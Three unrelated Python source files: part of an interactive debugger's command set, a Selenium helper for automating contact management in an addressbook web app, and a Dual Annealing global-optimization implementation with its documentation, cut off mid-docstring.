else:
self._print('Deleted breakpoint %s ' % (i,))
def where(self, argv): # backtrace
"""where
Print a stack trace, with the most recent frame at the bottom.
An arrow indicates the "current frame", which determines the
context of most commands. 'bt' is an alias for this command."""
self._dbg.print_stack_trace()
def up(self, argv):
"""up
Move the current frame one level up in the stack trace
        (to an older frame)."""
res = self._dbg.go_up()
if res:
self._print(res)
self._reset_namespace()
def down(self, argv):
"""down
Move the current frame one level down in the stack trace
        (to a newer frame)."""
res = self._dbg.go_down()
if res:
self._print(res)
self._reset_namespace()
def step(self, argv):
"""step
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function)."""
self._dbg.set_step()
raise CLI.CommandExit
def next(self, argv):
"""next
Continue execution until the next line in the current function
is reached or it returns."""
self._dbg.set_next(self._dbg.curframe)
raise CLI.CommandExit
def returns(self, argv):
"""returns
Continue execution until the current function returns."""
self._dbg.set_return(self._dbg.curframe)
raise CLI.CommandExit
def cont(self, arg):
"""cont
Continue execution, only stop when a breakpoint is encountered."""
self._dbg.set_continue()
if self._dbg.breaks:
raise CLI.CommandExit
else:
self._dbg._parser = None
raise CLI.CommandQuit
def jump(self, argv):
"""jump lineno
Set the next line that will be executed."""
if self._dbg.curindex + 1 != len(self._dbg.stack):
self._print("*** You can only jump within the bottom frame")
return
try:
arg = int(argv[1])
except ValueError:
self._print("*** The 'jump' command requires a line number.")
else:
try:
# Do the jump, fix up our copy of the stack, and display the
# new position
self._dbg.curframe.f_lineno = arg
self._dbg.stack[self._dbg.curindex] = self._dbg.stack[self._dbg.curindex][0], arg
self._dbg.print_stack_entry(self._dbg.stack[self._dbg.curindex])
except ValueError as e:
self._print('*** Jump failed:', e)
else:
self._reset_namespace()
def quit(self, argv):
"""quit or exit - Quit from the debugger.
The program being executed is aborted."""
super(DebuggerCommands, self).quit(argv)
def args(self, argv):
"""args
Print the arguments of the current function."""
f = self._dbg.curframe
co = f.f_code
dict = f.f_locals
n = co.co_argcount
if co.co_flags & 4: n = n+1
if co.co_flags & 8: n = n+1
for i in range(n):
name = co.co_varnames[i]
self._print(name, '=', None)
if name in dict:
self._print(dict[name])
else:
self._print("*** undefined ***")
def retval(self, argv):
"""retval
Show return value."""
val = self._dbg.retval()
if val is not None:
self._print(val)
def show(self, argv):
"""show [<name>...]
        Show the current frame's local objects and their values. If parameter
        names are given, show only those locals."""
f = self._dbg.curframe
if len(argv) > 1:
for name in argv[1:]:
try:
self._print("%25.25s = %s" % \
(name, _saferepr(f.f_locals[name])))
except KeyError:
self._print("%r not found." % (name,))
else:
self._ui.printf("%%I%s%%N (" % (f.f_code.co_name or "<lambda>",))
co = f.f_code
n = co.co_argcount
if co.co_flags & 4:
n += 1
if co.co_flags & 8:
n += 1
local = f.f_locals
for name in co.co_varnames[:n]:
val = local.get(name, "*** no formal ***")
self._print("%15.15s = %s," % (name, _saferepr(val)))
self._print(" )")
s = []
for name in co.co_varnames[n:]:
val = local.get(name, "*** undefined ***")
s.append("%25.25s = %s" % (name, _saferepr(val)))
if s:
self._print(" Compiled locals:")
self._print("\n".join(s))
# find and print local variables that were not defined when
# compiled. These must have been "stuffed" by other code.
extra = []
varnames = list(co.co_varnames) # to get list methods
for name, val in local.items():
try:
i = varnames.index(name)
except ValueError:
extra.append("%25.25s = %s" % (name, _saferepr(val)))
if extra:
self._print(" Extra locals:")
self._print("\n".join(extra))
def Print(self, argv):
"""Print <expression>
Print the value of the expression."""
try:
self._print(repr(self._dbg.getval(" ".join(argv[1:]))))
except:
ex, val = sys.exc_info()[:2]
self._print("***", ex, val)
def list(self, argv):
"""list [first [,last]]
List source code for the current file.
Without arguments, list 20 lines around the current line
or continue the previous listing.
With one argument, list 20 lines centered at that line.
With two arguments, list the given range;
if the second argument is less than the first, it is a count."""
last = None
if len(argv) >= 2:
first = max(1, int(argv[1]) - 10)
if len(argv) >= 3:
last = int(argv[2])
if last < first:
# Assume it's a count
last = first + last
elif self._dbg.lineno is None:
first = max(1, self._dbg.curframe.f_lineno - 10)
else:
first = self._dbg.lineno + 1
if last is None:
last = first + 20
filename = self._dbg.curframe.f_code.co_filename
self._print_source(filename, first, last)
def whatis(self, argv):
"""whatis arg
Prints the type of the argument."""
arg = " ".join(argv[1:])
try:
value = eval(arg, self._dbg.curframe.f_globals, self._dbg.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
self._print('***', exc_type_name + ':', repr(v))
return
# Is it a function?
try:
code = value.func_code
except:
pass
else:
self._print('Function', code.co_name)
return
# Is it an instance method?
try:
code = value.im_func.func_code
except:
pass
else:
self._print('Method', code.co_name)
return
# None of the above...
self._print(type(value))
def search(self, argv):
"""search <pattern>
Search the source file for the regular expression pattern."""
patt = re.compile(" ".join(argv[1:]))
filename = self._dbg.curframe.f_code.co_filename
if self._dbg.lineno is None:
start = 0
else:
start = max(0, self._dbg.lineno - 9)
lines = linecache.getlines(filename)[start:]
for lineno, line in enumerate(lines):
#line = linecache.getline(filename, lineno)
mo = patt.search(line)
if mo:
self._print_source(filename, lineno+start-10, lineno+start+10)
return
else:
self._print("Pattern not found.")
def _print_source(self, filename, first, last):
breaklist = self._dbg.get_file_breaks(filename)
try:
for lineno in range(first, last+1):
line = linecache.getline(filename, lineno)
if not line:
self._ui.printf('%Y[EOF]%N')
break
else:
s = []
s.append("%5.5s%s" % (lineno, self._ui.format(" %RB%N") if (lineno in breaklist) else " "))
if lineno == self._dbg.curframe.f_lineno:
s.append(self._ui.format("%I->%N "))
else:
s.append(" ")
self._print("".join(s), line.rstrip())
self._dbg.lineno = lineno
except KeyboardInterrupt:
pass
|
|
__author__ = 'ZSGX'
from model.contact import Contact
class ContactHelper:
def __init__(self, app):
self.app = app
def fill_contact_form(self, Contact):
wd = self.app.wd
self.app.edit_field(field_name="firstname", text=Contact.firstname)
self.app.edit_field(field_name="middlename", text=Contact.middlename)
self.app.edit_field(field_name="lastname", text=Contact.lastname)
self.app.edit_field(field_name="nickname", text=Contact.nickname)
self.app.edit_field(field_name="title", text=Contact.title)
self.app.edit_field(field_name="company", text=Contact.company)
self.app.edit_field(field_name="address", text=Contact.address)
# wd.find_element_by_name("theform").click()
#telephones
self.app.edit_field(field_name="home", text=Contact.homephone)
self.app.edit_field(field_name="mobile", text=Contact.mobilephone)
self.app.edit_field(field_name="work", text=Contact.workphone)
self.app.edit_field(field_name="fax", text=Contact.fax)
# email & homepage
self.app.edit_field(field_name="email2", text=Contact.email2)
self.app.edit_field(field_name="email3", text=Contact.email3)
self.app.edit_field(field_name="homepage", text=Contact.homepage)
# Secondary
self.app.edit_field(field_name="address2", text=Contact.address2)
self.app.edit_field(field_name="phone2", text=Contact.phone2)
self.app.edit_field(field_name="notes", text=Contact.notes)
#birthday
if Contact.bday is not None:
d = Contact.bday + 2
if not wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[%s]" % d).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[%s]" % d).click()
if Contact.bmonth is not None:
m = Contact.bmonth + 1
if not wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[%s]" % m).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[%s]" % m).click()
self.app.edit_field(field_name="byear", text=Contact.byear)
#anniversary
if Contact.aday is not None:
d = Contact.aday + 2
if not wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[%s]" % d).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[%s]" % d).click()
if Contact.amonth is not None:
m = Contact.amonth + 1
if not wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[%s]" % m).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[%s]" % m).click()
self.app.edit_field(field_name="ayear", text=Contact.ayear)
# photo
if Contact.filepath is not None:
wd.find_element_by_name("photo").send_keys(Contact.filepath)
def create(self, Contact):
wd = self.app.wd
wd.find_element_by_link_text("add new").click()
self.fill_contact_form(Contact)
#confirm contact creation
wd.find_element_by_name("submit").click()
self.go_to_homepage()
self.contact_cache = None
def go_to_homepage(self):
wd = self.app.wd
if wd.current_url.endswith("addressbook/") and len(wd.find_elements_by_name("add")) > 0:
return
wd.find_element_by_link_text("home").click()
def go_to_details(self, index):
wd = self.app.wd
ind = index+2
self.go_to_homepage()
wd.find_element_by_xpath("//table[@id='maintable']/tbody/tr[%s]/td[7]/a/img" % ind).click()
def go_to_details_by_id(self, id):
wd = self.app.wd
self.go_to_homepage()
wd.find_element_by_css_selector("a[href='view.php?id=%s']" % id).click()
def go_to_editpage_by_index_from_details(self, index):
wd = self.app.wd
self.go_to_details(index)
#init editing
wd.find_element_by_name("modifiy").click()
def go_to_editpage_by_id_from_details(self, id):
wd = self.app.wd
self.go_to_details_by_id(id)
#init editing
wd.find_element_by_name("modifiy").click()
def go_to_editpage_by_index_from_homepage(self, index):
wd = self.app.wd
ind = index+2
self.go_to_homepage()
wd.find_element_by_xpath("//table[@id='maintable']/tbody/tr[%s]/td[8]/a/img" % ind).click()
def go_to_editpage_by_id_from_homepage(self, id):
wd = self.app.wd
self.go_to_homepage()
wd.find_element_by_css_selector("a[href='edit.php?id=%s']" % id).click()
def edit_contact(self, Contact):
wd = self.app.wd
self.fill_contact_form(Contact)
#confirm contact creation
wd.find_element_by_name("update").click()
self.go_to_homepage()
self.contact_cache = None
def delete_first_contact_from_homepage(self):
wd = self.app.wd
self.delete_contact_by_index_from_homepage(0)
def delete_contact_by_index_from_homepage(self, index):
wd = self.app.wd
self.go_to_homepage()
#select contact
wd.find_elements_by_name("selected[]")[index].click()
#delete
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.go_to_homepage()
self.contact_cache = None
def delete_contact_by_id_from_homepage(self, id):
wd = self.app.wd
self.go_to_homepage()
#select contact
wd.find_element_by_css_selector("input[id='%s']" % id).click()
#delete
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.go_to_homepage()
self.contact_cache = None
def delete_first_contact_while_editing(self):
wd = self.app.wd
self.delete_contact_by_index_while_editing(0)
def delete_contact_by_index_while_editing(self, index):
wd = self.app.wd
self.go_to_editpage_by_index_from_homepage(index)
wd.find_element_by_xpath("//div[@id='content']/form[2]/input[2]").click()
self.go_to_homepage()
self.contact_cache = None
def delete_contact_by_id_while_editing(self, id):
wd = self.app.wd
self.go_to_editpage_by_id_from_homepage(id)
wd.find_element_by_xpath("//div[@id='content']/form[2]/input[2]").click()
self.go_to_homepage()
self.contact_cache = None
def count(self):
wd = self.app.wd
self.go_to_homepage()
return len(wd.find_elements_by_name("selected[]"))
contact_cache = None
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.go_to_homepage()
self.contact_cache = []
for el in wd.find_elements_by_name("entry"):
cell_list = el.find_elements_by_tag_name("td")
firstname = cell_list[2].text
lastname = cell_list[1].text
address = cell_list[3].text
mails = cell_list[4].text
tel = cell_list[5].text
id = el.find_element_by_name("selected[]").get_attribute("id")
self.contact_cache.append(Contact(firstname=firstname, lastname=lastname, id=id, tel=tel,
address=address, mails = mails))
return list(self.contact_cache)
def get_contact_props_from_editpage(self, index):
wd = self.app.wd
self.go_to_editpage_by_index_from_homepage(index)
id = wd.find_element_by_name("id").get_attribute("value")
firstname = wd.find_element_by_name("firstname").get_attribute("value")
middlename = wd.find_element_by_name("middlename").get_attribute("value")
lastname = wd.find_element_by_name("lastname").get_attribute("value")
nickname = wd.find_element_by_name("nickname").get_attribute("value")
company = wd.find_element_by_name("company").get_attribute("value")
title = wd.find_element_by_name("title").get_attribute("value")
address = wd.find_element_by_name("address").text
home = wd.find_element_by_name("home").get_attribute("value")
mobile = wd.find_element_by_name("mobile").get_attribute("value")
work = wd.find_element_by_name("work").get_attribute("value")
fax = wd.find_element_by_name("fax").get_attribute("value")
email = wd.find_element_by_name("email").get_attribute("value")
email2 = wd.find_element_by_name("email2").get_attribute("value")
email3 = wd.find_element_by_name("email3").get_attribute("value")
homepage = wd.find_element_by_name("homepage").get_attribute("value")
address2 = wd.find_element_by_name("address2").text
phone2 = wd.find_element_by_name("phone2").get_attribute("value")
notes = wd.find_element_by_name("notes").text
return Contact(firstname=firstname, middlename=middlename,lastname=lastname, nickname=nickname, title=title,
company=company, address=address, homephone=home, mobilephone=mobile, workphone=work, fax=fax,
email=email, email2=email2, email3=email3, homepage=homepage, address2=address2,
phone2=phone2, notes=notes, id=id)
def clean(self, contact):
def exclude_spaces(str):
newstr = ' '.join(map(lambda x: x.strip(), str.split()))
return newstr
return Contact(id=contact.id, firstname=exclude_spaces(contact.firstname),
lastname=exclude_spaces(contact.lastname), address=exclude_spaces(contact.address),
homephone=exclude_spaces(contact.homephone), mobilephone=exclude_spaces(contact.mobilephone),
workphone=exclude_spaces(contact.workphone), phone2=exclude_spaces(contact.phone2),
email=exclude_spaces(contact.email), email2=exclude_spaces(contact.email2),
email3=exclude_spaces(contact.email3), tel=None, mails=None)
|
|
# Dual Annealing implementation.
# Copyright (c) 2018 Sylvain Gubian <[email protected]>,
# Yang Xiang <[email protected]>
# Author: Sylvain Gubian, Yang Xiang, PMP S.A.
"""
A Dual Annealing global optimization algorithm
"""
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.optimize import OptimizeResult
from scipy.optimize import minimize
from scipy.special import gammaln
from scipy._lib._util import check_random_state
__all__ = ['dual_annealing']
class VisitingDistribution(object):
"""
Class used to generate new coordinates based on the distorted
Cauchy-Lorentz distribution. Depending on the steps within the strategy
chain, the class implements the strategy for generating new location
changes.
Parameters
----------
lb : array_like
A 1-D numpy ndarray containing lower bounds of the generated
        components. Neither NaN nor inf is allowed.
ub : array_like
A 1-D numpy ndarray containing upper bounds for the generated
        components. Neither NaN nor inf is allowed.
visiting_param : float
Parameter for visiting distribution. Default value is 2.62.
Higher values give the visiting distribution a heavier tail, this
makes the algorithm jump to a more distant region.
The value range is (0, 3].
rand_state : RandomState object
A numpy.random.RandomState object for using the current state of the
created random generator container.
"""
TAIL_LIMIT = 1.e8
MIN_VISIT_BOUND = 1.e-10
def __init__(self, lb, ub, visiting_param, rand_state):
self.visiting_param = visiting_param
self.rand_state = rand_state
self.lower = lb
self.upper = ub
self.bound_range = ub - lb
def visiting(self, x, step, temperature):
""" Based on the step in the strategy chain, new coordinated are
generated by changing all components is the same time or only
one of them, the new values are computed with visit_fn method
"""
dim = x.size
if step < dim:
            # Changing all coordinates with a new visiting value
visits = np.array([self.visit_fn(
temperature) for _ in range(dim)])
upper_sample = self.rand_state.random_sample()
lower_sample = self.rand_state.random_sample()
visits[visits > self.TAIL_LIMIT] = self.TAIL_LIMIT * upper_sample
visits[visits < -self.TAIL_LIMIT] = -self.TAIL_LIMIT * lower_sample
x_visit = visits + x
a = x_visit - self.lower
b = np.fmod(a, self.bound_range) + self.bound_range
x_visit = np.fmod(b, self.bound_range) + self.lower
x_visit[np.fabs(
x_visit - self.lower) < self.MIN_VISIT_BOUND] += 1.e-10
else:
# Changing only one coordinate at a time based on strategy
# chain step
x_visit = np.copy(x)
visit = self.visit_fn(temperature)
if visit > self.TAIL_LIMIT:
visit = self.TAIL_LIMIT * self.rand_state.random_sample()
elif visit < -self.TAIL_LIMIT:
visit = -self.TAIL_LIMIT * self.rand_state.random_sample()
index = step - dim
x_visit[index] = visit + x[index]
a = x_visit[index] - self.lower[index]
b = np.fmod(a, self.bound_range[index]) + self.bound_range[index]
x_visit[index] = np.fmod(b, self.bound_range[
index]) + self.lower[index]
if np.fabs(x_visit[index] - self.lower[
index]) < self.MIN_VISIT_BOUND:
x_visit[index] += self.MIN_VISIT_BOUND
return x_visit
def visit_fn(self, temperature):
""" Formula Visita from p. 405 of reference [2] """
factor1 = np.exp(np.log(temperature) / (self.visiting_param - 1.0))
factor2 = np.exp((4.0 - self.visiting_param) * np.log(
self.visiting_param - 1.0))
factor3 = np.exp((2.0 - self.visiting_param) * np.log(2.0) / (
self.visiting_param - 1.0))
factor4 = np.sqrt(np.pi) * factor1 * factor2 / (factor3 * (
3.0 - self.visiting_param))
factor5 = 1.0 / (self.visiting_param - 1.0) - 0.5
d1 = 2.0 - factor5
factor6 = np.pi * (1.0 - factor5) / np.sin(
np.pi * (1.0 - factor5)) / np.exp(gammaln(d1))
sigmax = np.exp(-(self.visiting_param - 1.0) * np.log(
factor6 / factor4) / (3.0 - self.visiting_param))
x = sigmax * self.rand_state.normal()
y = self.rand_state.normal()
den = np.exp(
(self.visiting_param - 1.0) * np.log((np.fabs(y))) / (
3.0 - self.visiting_param))
return x / den
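# Illustrative use of VisitingDistribution (a sketch, not part of the public
# API; the parameter values below are only examples):
#
#   rs = check_random_state(0)
#   lb, ub = np.array([-5., -5.]), np.array([5., 5.])
#   vd = VisitingDistribution(lb, ub, visiting_param=2.62, rand_state=rs)
#   x_new = vd.visiting(np.zeros(2), step=0, temperature=5230.)
#
# With step < x.size all coordinates are perturbed at once; for larger steps
# only the coordinate at index (step - x.size) is changed.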
class EnergyState(object):
"""
    Class used to record the energy state. At any time, it knows the
    currently used coordinates and the most recent best location.
Parameters
----------
    lower : array_like
        A 1-D numpy ndarray containing lower bounds for generating the initial
        random components in the `reset` method.
    upper : array_like
        A 1-D numpy ndarray containing upper bounds for generating the initial
        random components in the `reset` method.
        Neither NaN nor inf is allowed.
callback : callable, ``callback(x, f, context)``, optional
A callback function which will be called for all minima found.
``x`` and ``f`` are the coordinates and function value of the
latest minimum found, and `context` has value in [0, 1, 2]
"""
    # Maximum number of trials for generating a valid starting point
MAX_REINIT_COUNT = 1000
def __init__(self, lower, upper, callback=None):
self.ebest = None
self.current_energy = None
self.current_location = None
self.xbest = None
self.lower = lower
self.upper = upper
self.callback = callback
def reset(self, func_wrapper, rand_state, x0=None):
"""
        Initialize the current location in the search domain. If `x0` is not
provided, a random location within the bounds is generated.
"""
if x0 is None:
self.current_location = self.lower + rand_state.random_sample(
len(self.lower)) * (self.upper - self.lower)
else:
self.current_location = np.copy(x0)
init_error = True
reinit_counter = 0
while init_error:
self.current_energy = func_wrapper.fun(self.current_location)
if self.current_energy is None:
raise ValueError('Objective function is returning None')
if (not np.isfinite(self.current_energy) or np.isnan(
self.current_energy)):
if reinit_counter >= EnergyState.MAX_REINIT_COUNT:
init_error = False
message = (
                        'Stopping algorithm because the function '
                        'creates NaN or (+/-) infinity values even when '
                        'trying new random parameters'
)
raise ValueError(message)
self.current_location = self.lower + rand_state.random_sample(
self.lower.size) * (self.upper - self.lower)
reinit_counter += 1
else:
init_error = False
# If first time reset, initialize ebest and xbest
if self.ebest is None and self.xbest is None:
self.ebest = self.current_energy
self.xbest = np.copy(self.current_location)
# Otherwise, we keep them in case of reannealing reset
def update_best(self, e, x, context):
self.ebest = e
self.xbest = np.copy(x)
if self.callback is not None:
val = self.callback(x, e, context)
if val is not None:
if val:
return('Callback function requested to stop early by '
'returning True')
def update_current(self, e, x):
self.current_energy = e
self.current_location = np.copy(x)
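# Illustrative callback compatible with EnergyState (and with dual_annealing
# below); it is a sketch only and is not used anywhere in this module.
def _example_callback(x, f, context):
    # `x` and `f` are the coordinates and value of the latest minimum found;
    # `context` is 0, 1 or 2 depending on which phase reported it (see the
    # update_best() calls in StrategyChain). Returning True stops the run early.
    print("new minimum f=%g (context=%d)" % (f, context))
    return False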
class StrategyChain(object):
"""
Class that implements within a Markov chain the strategy for location
acceptance and local search decision making.
Parameters
----------
acceptance_param : float
Parameter for acceptance distribution. It is used to control the
probability of acceptance. The lower the acceptance parameter, the
smaller the probability of acceptance. Default value is -5.0 with
a range (-1e4, -5].
visit_dist : VisitingDistribution
Instance of `VisitingDistribution` class.
func_wrapper : ObjectiveFunWrapper
Instance of `ObjectiveFunWrapper` class.
minimizer_wrapper: LocalSearchWrapper
Instance of `LocalSearchWrapper` class.
rand_state : RandomState object
A numpy.random.RandomState object for using the current state of the
created random generator container.
energy_state: EnergyState
Instance of `EnergyState` class.
"""
def __init__(self, acceptance_param, visit_dist, func_wrapper,
minimizer_wrapper, rand_state, energy_state):
# Local strategy chain minimum energy and location
self.emin = energy_state.current_energy
self.xmin = np.array(energy_state.current_location)
# Global optimizer state
self.energy_state = energy_state
# Acceptance parameter
self.acceptance_param = acceptance_param
# Visiting distribution instance
self.visit_dist = visit_dist
# Wrapper to objective function
self.func_wrapper = func_wrapper
# Wrapper to the local minimizer
self.minimizer_wrapper = minimizer_wrapper
self.not_improved_idx = 0
self.not_improved_max_idx = 1000
self._rand_state = rand_state
self.temperature_step = 0
self.K = 100 * len(energy_state.current_location)
def accept_reject(self, j, e, x_visit):
r = self._rand_state.random_sample()
pqv_temp = (self.acceptance_param - 1.0) * (
e - self.energy_state.current_energy) / (
self.temperature_step + 1.)
if pqv_temp <= 0.:
pqv = 0.
else:
pqv = np.exp(np.log(pqv_temp) / (
1. - self.acceptance_param))
if r <= pqv:
# We accept the new location and update state
self.energy_state.update_current(e, x_visit)
self.xmin = np.copy(self.energy_state.current_location)
# No improvement for a long time
if self.not_improved_idx >= self.not_improved_max_idx:
if j == 0 or self.energy_state.current_energy < self.emin:
self.emin = self.energy_state.current_energy
self.xmin = np.copy(self.energy_state.current_location)
def run(self, step, temperature):
self.temperature_step = temperature / float(step + 1)
self.not_improved_idx += 1
for j in range(self.energy_state.current_location.size * 2):
if j == 0:
if step == 0:
self.energy_state_improved = True
else:
self.energy_state_improved = False
x_visit = self.visit_dist.visiting(
self.energy_state.current_location, j, temperature)
# Calling the objective function
e = self.func_wrapper.fun(x_visit)
if e < self.energy_state.current_energy:
# We have got a better energy value
self.energy_state.update_current(e, x_visit)
if e < self.energy_state.ebest:
val = self.energy_state.update_best(e, x_visit, 0)
if val is not None:
if val:
return val
self.energy_state_improved = True
self.not_improved_idx = 0
else:
# We have not improved but do we accept the new location?
self.accept_reject(j, e, x_visit)
if self.func_wrapper.nfev >= self.func_wrapper.maxfun:
                return ('Maximum number of function calls reached '
'during annealing')
# End of StrategyChain loop
def local_search(self):
# Decision making for performing a local search
# based on strategy chain results
        # If the energy has improved, or there has been no improvement for too
        # long, perform a local search from the best strategy chain location
if self.energy_state_improved:
# Global energy has improved, let's see if LS improves further
e, x = self.minimizer_wrapper.local_search(self.energy_state.xbest,
self.energy_state.ebest)
if e < self.energy_state.ebest:
self.not_improved_idx = 0
val = self.energy_state.update_best(e, x, 1)
if val is not None:
if val:
return val
self.energy_state.update_current(e, x)
if self.func_wrapper.nfev >= self.func_wrapper.maxfun:
                return ('Maximum number of function calls reached '
'during local search')
# Check probability of a need to perform a LS even if no improvement
do_ls = False
if self.K < 90 * len(self.energy_state.current_location):
pls = np.exp(self.K * (
self.energy_state.ebest - self.energy_state.current_energy
) / self.temperature_step)
if pls >= self._rand_state.random_sample():
do_ls = True
# Global energy not improved, let's see what LS gives
# on the best strategy chain location
if self.not_improved_idx >= self.not_improved_max_idx:
do_ls = True
if do_ls:
e, x = self.minimizer_wrapper.local_search(self.xmin, self.emin)
self.xmin = np.copy(x)
self.emin = e
self.not_improved_idx = 0
self.not_improved_max_idx = self.energy_state.current_location.size
if e < self.energy_state.ebest:
val = self.energy_state.update_best(
self.emin, self.xmin, 2)
if val is not None:
if val:
return val
self.energy_state.update_current(e, x)
if self.func_wrapper.nfev >= self.func_wrapper.maxfun:
                return ('Maximum number of function calls reached '
'during dual annealing')
class ObjectiveFunWrapper(object):
def __init__(self, func, maxfun=1e7, *args):
self.func = func
self.args = args
# Number of objective function evaluations
self.nfev = 0
# Number of gradient function evaluation if used
self.ngev = 0
# Number of hessian of the objective function if used
self.nhev = 0
self.maxfun = maxfun
def fun(self, x):
self.nfev += 1
return self.func(x, *self.args)
class LocalSearchWrapper(object):
"""
Class used to wrap around the minimizer used for local search
Default local minimizer is SciPy minimizer L-BFGS-B
"""
LS_MAXITER_RATIO = 6
LS_MAXITER_MIN = 100
LS_MAXITER_MAX = 1000
def __init__(self, bounds, func_wrapper, **kwargs):
self.func_wrapper = func_wrapper
self.kwargs = kwargs
self.minimizer = minimize
bounds_list = list(zip(*bounds))
self.lower = np.array(bounds_list[0])
self.upper = np.array(bounds_list[1])
# If no minimizer specified, use SciPy minimize with 'L-BFGS-B' method
if not self.kwargs:
n = len(self.lower)
ls_max_iter = min(max(n * self.LS_MAXITER_RATIO,
self.LS_MAXITER_MIN),
self.LS_MAXITER_MAX)
self.kwargs['method'] = 'L-BFGS-B'
self.kwargs['options'] = {
'maxiter': ls_max_iter,
}
self.kwargs['bounds'] = list(zip(self.lower, self.upper))
def local_search(self, x, e):
# Run local search from the given x location where energy value is e
x_tmp = np.copy(x)
mres = self.minimizer(self.func_wrapper.fun, x, **self.kwargs)
if 'njev' in mres.keys():
self.func_wrapper.ngev += mres.njev
if 'nhev' in mres.keys():
self.func_wrapper.nhev += mres.nhev
        # Check that the returned value is valid (finite and within bounds)
is_finite = np.all(np.isfinite(mres.x)) and np.isfinite(mres.fun)
in_bounds = np.all(mres.x >= self.lower) and np.all(
mres.x <= self.upper)
is_valid = is_finite and in_bounds
        # Use the new point only if it is valid and gives a better result
if is_valid and mres.fun < e:
return mres.fun, mres.x
else:
return e, x_tmp
def dual_annealing(func, bounds, args=(), maxiter=1000,
local_search_options={}, initial_temp=5230.,
restart_temp_ratio=2.e-5, visit=2.62, accept=-5.0,
maxfun=1e7, seed=None, no_local_search=False,
callback=None, x0=None):
"""
Find the global minimum of a function using Dual Annealing.
Parameters
----------
func : callable
The objective function to be minimized. Must be in the form
``f(x, *args)``, where ``x`` is the argument in the form of a 1-D array
and ``args`` is a tuple of any additional fixed parameters needed to
completely specify the function.
bounds : sequence, shape (n, 2)
Bounds for variables. ``(min, max)`` pairs for each element in ``x``,
defining bounds for the objective function parameter.
args : tuple, optional
Any additional fixed parameters needed to completely specify the
objective function.
maxiter : int, optional
The maximum number of global search iterations. Default value is 1000.
local_search_options : dict, optional
Extra keyword arguments to be passed to the local minimizer
(`minimize`). Some important options could be:
``method`` for the minimizer method to use and ``args`` for
objective function additional arguments.
initial_temp : float, optional
        The initial temperature. Use higher values to facilitate a wider
        search of the energy landscape, allowing dual_annealing to escape
        local minima that it is trapped in. Default value is 5230. Range is
(0.01, 5.e4].
restart_temp_ratio : float, optional
        During the annealing process, the temperature decreases; when it
        reaches ``initial_temp * restart_temp_ratio``, the reannealing process
        is triggered. Default value of the ratio is 2e-5. Range is (0, 1).
visit : float, optional
        Parameter for visiting distribution. Default value is 2.62. Higher
        values give the visiting distribution a heavier tail, which makes
        the algorithm jump to more distant regions. The value range is (0, 3].
accept : float, optional
Parameter for acceptance distribution. It is used to control the
probability of acceptance. The lower the acceptance parameter, the
smaller the probability of acceptance. Default value is -5.0 with
a range (-1e4, -5].
maxfun : int, optional
        Soft limit for the number of objective function calls. If the
        algorithm is in the middle of a local search, this number may be
        exceeded; the algorithm will stop just after the local search is
        done. Default value is 1e7.
seed : {int or `numpy.random.RandomState` instance}, optional
If `seed` is not specified the `numpy.random.RandomState` singleton is
used.
If `seed` is an int, a new ``RandomState`` instance is used,
seeded with `seed`.
If `seed` is already a ``RandomState`` instance, then that
instance is used.
Specify `seed` for repeatable minimizations. The random numbers
generated with this seed only affect the visiting distribution
function and new coordinates generation.
no_local_search : bool, optional
If `no_local_search` is set to True, a traditional Generalized
Simulated Annealing will be performed with no local search
strategy applied.
callback : callable, optional
A callback function with signature ``callback(x, f, context)``,
which will be called for all minima found.
``x`` and ``f`` are the coordinates and function value of the
latest minimum found, and ``context`` has value in [0, 1, 2], with the
following meaning:
- 0: minimum detected in the annealing process.
            - 1: detection occurred in the local search process.
- 2: detection done in the dual annealing process.
If the callback implementation returns True, the algorithm will stop.
x0 : ndarray, shape(n,), optional
Coordinates of a single n-dimensional starting point.
Returns
-------
res : OptimizeResult
The optimization result represented as a `OptimizeResult` object.
Important attributes are: ``x`` the solution array, ``fun`` the value
of the function at the solution, and ``message`` which describes the
cause of the termination.
See `OptimizeResult` for a description of other attributes.
Notes
-----
    This function implements the Dual Annealing optimization. This stochastic
    approach, derived from [3]_, combines the generalization of CSA (Classical
    Simulated Annealing) and FSA (Fast Simulated Annealing) [1]_ [2]_, coupled
    with a strategy for applying a local search on accepted locations [4]_.
An alternative implementation of this same algorithm is described in [5]_
and benchmarks are presented in [6]_. This approach introduces an advanced
method to refine the solution found by the generalized annealing
process. This algorithm uses a distorted Cauchy-Lorentz visiting
distribution, with its shape controlled by the parameter :math:`q_{v}`
.. math::
g_{q_{v}}(\\Delta x(t)) \\propto \\frac{ \\
\\left[T_{q_{v}}(t) \\right]^{-\\frac{D}{3-q_{v}}}}{ \\
\\left[{1+(q_{v}-1)\\frac{(\\Delta x(t))^{2}} { \\
\\left[T_{q_{v}}(t)\\right]^{\\frac{2}{3-q_{v}}}}}\\right]^{ \\
\\frac{1}{q_{v}-1}+\\frac{D-1}{2}}}
Where :math:`t` is the artificial time. This visiting distribution is used
to generate a trial jump distance :math:`\\Delta x(t)` of variable
:math:`x(t)` under artificial temperature :math:`T_{q_{v}}(t)`.
From the starting point, after calling the visiting distribution
function, the acceptance probability is computed as follows:
.. math::
p_{q_{a}} = \\min{\\{1,\\left[1-(1-q_{a}) \\beta \\Delta E \\right]^{ \\
\\frac{1}{1-q_{a}}}\\}}
    Where :math:`q_{a}` is an acceptance parameter. For :math:`q_{a}<1`, zero
acceptance probability is assigned to the cases where
.. math::
[1-(1-q_{a}) \\beta \\Delta E] < 0
The artificial temperature :math:`T_{q_{v}}(t)` is decreased according to
.. math::
T_{q_{v}}(t) = T_{q_{v}}(1) \\frac{2^{q_{v}-1}-1}{\\left( \\
1 + t\\right)^{q_{v}-1}-1}
Where :math:`q_{v}` is the visiting parameter.
.. versionadded:: 1.2.0
